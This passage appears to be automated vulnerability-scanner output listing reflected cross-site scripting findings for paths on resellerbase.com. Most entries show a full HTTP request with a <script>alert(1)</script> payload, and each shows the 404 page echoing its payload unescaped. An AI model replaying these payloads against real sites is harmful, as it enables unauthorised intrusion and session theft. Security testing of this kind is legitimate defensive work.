GET /detail/9/themes/kosmos/images/rating/?776e9<script>alert(1)</script>572cc55018e=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:19:10 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/9/themes/kosmos/images/rating/?776e9<script>alert(1)</script>572cc55018e=1 was not found on this server.</p>
...[SNIP]...

2.3772. http://www.resellerbase.com/detail/9/themes/kosmos/images/rating/3.gif [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/9/themes/kosmos/images/rating/3.gif

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 17d8e<script>alert(1)</script>a359f00de4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail17d8e<script>alert(1)</script>a359f00de4/9/themes/kosmos/images/rating/3.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:37:22 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail17d8e<script>alert(1)</script>a359f00de4/9/themes/kosmos/images/rating/3.gif was not found on this server.</p>
...[SNIP]...

2.3773. http://www.resellerbase.com/detail/9/themes/kosmos/images/rating/3.gif [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/9/themes/kosmos/images/rating/3.gif

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload bf890<script>alert(1)</script>5838ffdac10 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/9bf890<script>alert(1)</script>5838ffdac10/themes/kosmos/images/rating/3.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:37:33 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/9bf890<script>alert(1)</script>5838ffdac10/themes/kosmos/images/rating/3.gif was not found on this server.</p>
...[SNIP]...

2.3774. http://www.resellerbase.com/detail/9/themes/kosmos/images/rating/3.gif [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/9/themes/kosmos/images/rating/3.gif

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload bb9bb<script>alert(1)</script>9f8d37465ca was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/9/themesbb9bb<script>alert(1)</script>9f8d37465ca/kosmos/images/rating/3.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:37:44 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/9/themesbb9bb<script>alert(1)</script>9f8d37465ca/kosmos/images/rating/3.gif was not found on this server.</p>
...[SNIP]...

2.3775. http://www.resellerbase.com/detail/9/themes/kosmos/images/rating/3.gif [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/9/themes/kosmos/images/rating/3.gif

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload bf93d<script>alert(1)</script>1e0ba2afaa2 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/9/themes/kosmosbf93d<script>alert(1)</script>1e0ba2afaa2/images/rating/3.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:37:55 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/9/themes/kosmosbf93d<script>alert(1)</script>1e0ba2afaa2/images/rating/3.gif was not found on this server.</p>
...[SNIP]...

2.3776. http://www.resellerbase.com/detail/9/themes/kosmos/images/rating/3.gif [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/9/themes/kosmos/images/rating/3.gif

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 276d0<script>alert(1)</script>82d936d03 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/9/themes/kosmos/images276d0<script>alert(1)</script>82d936d03/rating/3.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:38:06 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/9/themes/kosmos/images276d0<script>alert(1)</script>82d936d03/rating/3.gif was not found on this server.</p>
...[SNIP]...

2.3777. http://www.resellerbase.com/detail/9/themes/kosmos/images/rating/3.gif [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/9/themes/kosmos/images/rating/3.gif

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 660f7<script>alert(1)</script>d0e3ce9e123 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/9/themes/kosmos/images/rating660f7<script>alert(1)</script>d0e3ce9e123/3.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:38:18 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/9/themes/kosmos/images/rating660f7<script>alert(1)</script>d0e3ce9e123/3.gif was not found on this server.</p>
...[SNIP]...

2.3778. http://www.resellerbase.com/detail/9/themes/kosmos/images/rating/3.gif [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/9/themes/kosmos/images/rating/3.gif

Issue detail

The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload e1d6c<script>alert(1)</script>7ae9a00f1c9 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/9/themes/kosmos/images/rating/3.gife1d6c<script>alert(1)</script>7ae9a00f1c9 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:38:29 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/9/themes/kosmos/images/rating/3.gife1d6c<script>alert(1)</script>7ae9a00f1c9 was not found on this server.</p>
...[SNIP]...

2.3779. http://www.resellerbase.com/detail/9/themes/kosmos/images/rating/3.gif [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/9/themes/kosmos/images/rating/3.gif

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload f07cc<script>alert(1)</script>732e8e2f11c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/9/themes/kosmos/images/rating/3.gif?f07cc<script>alert(1)</script>732e8e2f11c=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:37:06 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/9/themes/kosmos/images/rating/3.gif?f07cc<script>alert(1)</script>732e8e2f11c=1 was not found on this server.</p>
...[SNIP]...

2.3780. http://www.resellerbase.com/detail/9/themes/kosmos/images/rating/search.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/9/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 97534<script>alert(1)</script>209ba810dd4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail97534<script>alert(1)</script>209ba810dd4/9/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/9/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:20:58 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail97534<script>alert(1)</script>209ba810dd4/9/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3781. http://www.resellerbase.com/detail/9/themes/kosmos/images/rating/search.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/9/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload ec282<script>alert(1)</script>6d9a0724c8a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/9ec282<script>alert(1)</script>6d9a0724c8a/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/9/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:21:08 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/9ec282<script>alert(1)</script>6d9a0724c8a/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3782. http://www.resellerbase.com/detail/9/themes/kosmos/images/rating/search.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/9/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 54be1<script>alert(1)</script>7148cd6e897 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/9/themes54be1<script>alert(1)</script>7148cd6e897/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/9/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:21:19 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/9/themes54be1<script>alert(1)</script>7148cd6e897/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3783. http://www.resellerbase.com/detail/9/themes/kosmos/images/rating/search.php [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/9/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 87d06<script>alert(1)</script>9363e776b16 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/9/themes/kosmos87d06<script>alert(1)</script>9363e776b16/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/9/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:21:32 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/9/themes/kosmos87d06<script>alert(1)</script>9363e776b16/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3784. http://www.resellerbase.com/detail/9/themes/kosmos/images/rating/search.php [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/9/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 58a92<script>alert(1)</script>b10d7c00487 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/9/themes/kosmos/images58a92<script>alert(1)</script>b10d7c00487/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/9/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:21:44 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/9/themes/kosmos/images58a92<script>alert(1)</script>b10d7c00487/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3785. http://www.resellerbase.com/detail/9/themes/kosmos/images/rating/search.php [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/9/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 343b2<script>alert(1)</script>35ec8cd0080 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/9/themes/kosmos/images/rating343b2<script>alert(1)</script>35ec8cd0080/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/9/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:21:54 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/9/themes/kosmos/images/rating343b2<script>alert(1)</script>35ec8cd0080/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3786. http://www.resellerbase.com/detail/9/themes/kosmos/images/rating/search.php [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/9/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload d4ed5<script>alert(1)</script>956ca889fd7 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/9/themes/kosmos/images/rating/search.phpd4ed5<script>alert(1)</script>956ca889fd7?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/9/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:22:08 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/9/themes/kosmos/images/rating/search.phpd4ed5<script>alert(1)</script>956ca889fd7?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3787. http://www.resellerbase.com/detail/9/themes/kosmos/images/rating/search.php [Submit3 parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/9/themes/kosmos/images/rating/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload 79224<a>345f365a71b was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/9/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search79224<a>345f365a71b&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/9/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:19:00 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/9/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search79224<a>345f365a71b&opt=2 was not found on this server.</p>
...[SNIP]...

2.3788. http://www.resellerbase.com/detail/9/themes/kosmos/images/rating/search.php [keyword parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/9/themes/kosmos/images/rating/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload a2b5b<a>fcea11e52d1 was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/9/themes/kosmos/images/rating/search.php?keyword=search...a2b5b<a>fcea11e52d1&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/9/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:18:40 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/9/themes/kosmos/images/rating/search.php?keyword=search...a2b5b<a>fcea11e52d1&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3789. http://www.resellerbase.com/detail/9/themes/kosmos/images/rating/search.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/9/themes/kosmos/images/rating/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload f966f<script>alert(1)</script>8a8c0dec2d3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/9/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2&f966f<script>alert(1)</script>8a8c0dec2d3=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/9/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:20:35 GMT
Server: Apache/2
